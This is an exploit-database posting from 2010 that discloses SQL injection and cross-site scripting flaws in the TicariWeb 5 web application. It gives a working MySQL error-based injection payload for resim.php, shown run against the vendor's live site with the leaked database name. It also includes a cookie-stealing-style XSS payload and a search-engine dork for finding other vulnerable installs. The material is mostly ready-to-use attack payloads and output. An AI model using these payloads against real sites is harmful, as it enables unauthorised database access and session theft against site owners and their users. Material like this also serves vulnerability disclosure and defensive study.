[webapps / 0day] - TicariWeb 5 <= Remote (SQL/XSS) Multip
Posted on 21 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>TicariWeb 5 <= Remote (SQL/XSS) Multiple Vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='TicariWeb 5 <= Remote (SQL/XSS) Multiple Vulnerabilities by KnocKout in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>======================================================== TicariWeb 5 <= Remote (SQL/XSS) Multiple Vulnerabilities ======================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ###################################### 1 0 I'm KnocKout member from Inj3ct0r Team 1 1 ###################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockoutr@msn.com ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : TicariWeb |~Version : 5 |~Software: http://www.ticariweb.com |~Vulnerability Style : SQL Injection and Cross Site Scripting. |~Vulnerability Dir : / |~Google Keyword : http://www.google.com.tr/webhp?hl=tr#hl=tr&source=hp&biw=1280&bih=813&q=TicariWeb+5++%C4%B0le+Haz%C4%B1rlanm%C4%B1%C5%9Ft%C4%B1r.+&aq=f&aqi=&aql=&oq=&gs_rfai=&fp=ba29c8cddf27b444 |~SQL Method : MySQL error based |[~]Tested on : (L):Vista, (R):MySQL 5,PHP/5.1.6,Apache/2.2.3 (CentOS) and Demos.. ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============================================================== |{~~~~~~~~ Explotation| MySQL error based Injection~~~~~~~~~~~}| http://VICTIM/resim.php?id=17&katid=2 {SQL Injection} Ex; http://www.ticariweb.com [~] SQL Injecting(Db Name Get..) http://www.ticariweb.com/resim.php?id=17&katid=2 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 [~]MysqL Error : Duplicate entry '~'tw2008db'~1' for key 1 [+]Database Name is found "tw2008db" ------- Continue to take an example here : http://inj3ct0r.com/exploits/14509 ============================================================= |{~~~~~~~~ Explotation| Cross Site Scripting{XSS} ~~~~~~~~~~~}| http://VICTIM/resim.php?id=17&katid=2 "><script>alert(document.cookie)</script> [~] Scripting.. [+] Alert!: YOUR COOKIE. ------- ============================================================= # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-21]</pre></body></html>